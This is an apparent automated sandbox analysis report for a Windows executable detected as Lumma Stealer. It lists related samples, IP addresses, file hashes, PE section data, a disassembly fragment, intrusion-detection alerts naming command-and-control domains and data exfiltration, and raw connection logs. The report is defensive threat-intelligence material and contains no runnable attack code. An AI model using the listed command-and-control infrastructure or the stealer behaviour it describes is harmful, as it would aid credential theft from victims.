                                                                                                                                                                                                                                                    l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    SQHE4Hsjo6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    GHXsFkoroU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    AKAMAI-ASN1EUMPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    SQHE4Hsjo6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    GHXsFkoroU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    CLOUDFLARENETUSMPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                                    l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                                    XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                                    GHXsFkoroU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.21.66.86
                                                                                                                                                                                                                                                    TNyOrM6mIM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.21.2.51
                                                                                                                                                                                                                                                    5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                                    TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                                    3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.21.66.86
                                                                                                                                                                                                                                                    726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                                    Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.21.66.86
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.21.66.86
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    SQHE4Hsjo6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.21.66.86
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.21.66.86
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    GHXsFkoroU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.21.66.86
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    TNyOrM6mIM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.21.66.86
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.21.66.86
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.21.66.86
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.21.66.86
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.21.66.86
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                    No created / dropped files found
                                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Entropy (8bit):6.574738639784637
                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                    File name:oe9KS7ZHUc.exe
                                                                                                                                                                                                                                                    File size:2'984'448 bytes
                                                                                                                                                                                                                                                    MD5:2de305ce45cdf39a8ad3c35979492cdd
                                                                                                                                                                                                                                                    SHA1:584ace030f35030eb97a141b166abec0027ff90a
                                                                                                                                                                                                                                                    SHA256:2e8a71deb7a72c5c552a0c2c05baf20eda3750d6498d1f32771fb241673fc209
                                                                                                                                                                                                                                                    SHA512:c8bb3a9c0cbef2b79ea9693f19e15f5a4255d6ed0a0e1b4f4923a323fb6b66e95a82510cbf8a7b012e70734f7cc299e2c98a554bb39b36d8b485b24ad5f79770
                                                                                                                                                                                                                                                    SSDEEP:49152:lCzlWVkj06lUPyVOalBr46AdwwAaRL/r4s:lCzlWVkj0EUPyo0Br46Adwel/8s
                                                                                                                                                                                                                                                    TLSH:22D55BA2B50972CBD48F27788467CDC25D6D43BA071459C3A96CA4BA7DE3CC439BAC34
                                                                                                                                                                                                                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig.............................P0...........@...........................0...........@.................................Y@..m..
                                                                                                                                                                                                                                                    Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                    Entrypoint:0x705000
                                                                                                                                                                                                                                                    Entrypoint Section:.taggant
                                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                    Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                    jmp 00007FD844BA167Ah
                                                                                                                                                                                                                                                    punpckhbw mm5, qword ptr [00000000h]
                                                                                                                                                                                                                                                    add cl, ch
                                                                                                                                                                                                                                                    add byte ptr [eax], ah
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [ebx], cl
                                                                                                                                                                                                                                                    or al, byte ptr [eax]
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], dh
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add al, 00h
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [ecx], cl
                                                                                                                                                                                                                                                    add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    adc byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    or ecx, dword ptr [edx]
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    xor byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    or byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    and al, byte ptr [eax]
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    or dword ptr [eax+00000000h], eax
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    adc byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    or ecx, dword ptr [edx]
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    xor byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [edx], ah
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [ecx], al
                                                                                                                                                                                                                                                    add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    adc byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add cl, byte ptr [edx]
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    xor byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    or al, 80h
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                    0x10000x520000x2640011a7e8af2ecd31a662670b0ffa6149f5False0.9995978860294118data7.979400373790869IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    .rsrc 0x530000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    tgmjpzal0x550000x2af0000x2aee0034973cb302c14c342cdceb0a5b621f1aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    tgxwrrdf0x3040000x10000x400ddf8931d76be5692869b8cc02b9de1b8False0.7099609375data5.61255032986743IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    .taggant0x3050000x30000x2200ae1a0718a5e2b7f404409be1ee7d9af1False0.05939797794117647DOS executable (COM)0.73689978589613IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                                    kernel32.dlllstrcpy
                                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                    2024-12-28T10:07:29.314346+01002058582ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mindhandru .buzz)1192.168.2.4511301.1.1.153UDP
                                                                                                                                                                                                                                                    2024-12-28T10:07:29.467544+01002058584ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz)1192.168.2.4555131.1.1.153UDP
                                                                                                                                                                                                                                                    2024-12-28T10:07:29.612976+01002058586ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz)1192.168.2.4579371.1.1.153UDP
                                                                                                                                                                                                                                                    2024-12-28T10:07:29.756412+01002058588ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz)1192.168.2.4589681.1.1.153UDP
                                                                                                                                                                                                                                                    2024-12-28T10:07:29.897339+01002058580ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz)1192.168.2.4509151.1.1.153UDP
                                                                                                                                                                                                                                                    2024-12-28T10:07:30.038081+01002058590ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz)1192.168.2.4521981.1.1.153UDP
                                                                                                                                                                                                                                                    2024-12-28T10:07:30.214797+01002058572ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz)1192.168.2.4512161.1.1.153UDP
                                                                                                                                                                                                                                                    2024-12-28T10:07:30.368042+01002058576ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz)1192.168.2.4626601.1.1.153UDP
                                                                                                                                                                                                                                                    2024-12-28T10:07:30.551718+01002058578ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz)1192.168.2.4569751.1.1.153UDP
                                                                                                                                                                                                                                                    2024-12-28T10:07:32.233644+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973123.55.153.106443TCP
                                                                                                                                                                                                                                                    2024-12-28T10:07:32.994262+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.44973123.55.153.106443TCP
                                                                                                                                                                                                                                                    2024-12-28T10:07:34.787525+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.66.86443TCP
                                                                                                                                                                                                                                                    2024-12-28T10:07:35.521737+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449732104.21.66.86443TCP
                                                                                                                                                                                                                                                    2024-12-28T10:07:35.521737+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732104.21.66.86443TCP
                                                                                                                                                                                                                                                    2024-12-28T10:07:36.813500+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.66.86443TCP
                                                                                                                                                                                                                                                    2024-12-28T10:07:37.565195+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449733104.21.66.86443TCP
                                                                                                                                                                                                                                                    2024-12-28T10:07:37.565195+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449733104.21.66.86443TCP
                                                                                                                                                                                                                                                    2024-12-28T10:07:39.370365+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.66.86443TCP
                                                                                                                                                                                                                                                    2024-12-28T10:07:41.837134+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.66.86443TCP
                                                                                                                                                                                                                                                    2024-12-28T10:07:44.232527+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736104.21.66.86443TCP
                                                                                                                                                                                                                                                    2024-12-28T10:07:47.134711+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738104.21.66.86443TCP
                                                                                                                                                                                                                                                    2024-12-28T10:07:49.048667+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449738104.21.66.86443TCP
                                                                                                                                                                                                                                                    2024-12-28T10:07:50.846283+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.66.86443TCP
                                                                                                                                                                                                                                                    2024-12-28T10:07:57.286230+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745104.21.66.86443TCP
                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.838422060 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.838485956 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.838563919 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.841320992 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:30.841341019 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:32.233475924 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:32.233644009 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:32.236082077 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:32.236099005 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:32.236330032 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:32.286115885 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:32.289397001 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:32.331353903 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:32.994283915 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:32.994308949 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:32.994328022 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:32.994354010 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:32.994432926 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:32.994436979 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:32.994479895 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:32.994586945 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:32.994586945 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:32.994586945 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.174340963 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.174412966 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.174532890 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.174609900 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.174669981 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.207699060 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.207765102 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.207803965 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.207878113 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.207928896 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.233405113 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.233464003 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.233484030 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.233491898 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.570771933 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.570825100 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.571029902 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.571351051 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:33.571365118 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:34.787421942 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:34.787524939 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:34.790457010 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:34.790467024 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:34.790724993 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:34.791892052 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:34.791904926 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:34.791951895 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:35.521734953 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:35.521831036 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:35.521888971 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:35.522165060 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:35.522165060 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:35.522186995 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:35.522197962 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:35.551244974 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:35.551318884 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:35.551407099 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:35.551892996 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                    Dec 28, 2024 10:07:35.551913023 CET44349733104.21.66.86192.168.2.4
